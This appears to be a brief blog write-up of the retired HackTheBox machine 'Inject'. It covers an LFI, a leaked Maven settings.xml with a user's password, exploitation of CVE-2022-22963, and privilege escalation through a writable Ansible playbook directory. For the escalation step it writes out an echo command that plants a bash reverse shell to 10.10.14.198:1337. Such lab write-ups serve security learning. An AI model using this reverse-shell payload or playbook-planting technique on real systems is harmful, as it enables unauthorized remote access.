Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HacktheBox - Inject
|htbmachinesretired|

HacktheBox - Inject

Author: gotNothingHere

Initial Enumeration

Web

We find LFI on

Leak on proc fd

Checking the Entrypoint file we see it is a SpringApplication

creds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

checking pom.xml we see it can be vurnable to CVE-2022-22963

After getting the shell we can su to phil using the password we had found in settings.xml

Privilege Escalation

After getting shell as phil we see we are part of staff group

in /opt/automations/tasks/

we find some ansible playbook

using gtfobins we can create a payload as

1
echo '[{hosts: localhost, tasks: [shell: /bin/bash -c "bash -i >& /dev/tcp/10.10.14.198/1337 0>&1"]}]' > playbook_2.yml

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/inject/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
cvelinuxwriteupretiredhacktheboxeasylficonfig-dumpcve-2022-22963ansible